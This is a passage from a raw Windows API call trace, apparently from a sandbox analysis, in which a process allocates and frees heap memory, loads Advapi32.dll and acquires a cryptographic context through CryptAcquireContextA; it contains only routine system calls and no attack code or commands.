wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.629] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0264.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.631] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0264.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.631] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.632] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.632] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.633] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.633] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0264.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.634] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.634] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.635] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0264.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0264.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.636] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0264.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0264.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ba8 [0264.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0264.637] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.649] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: 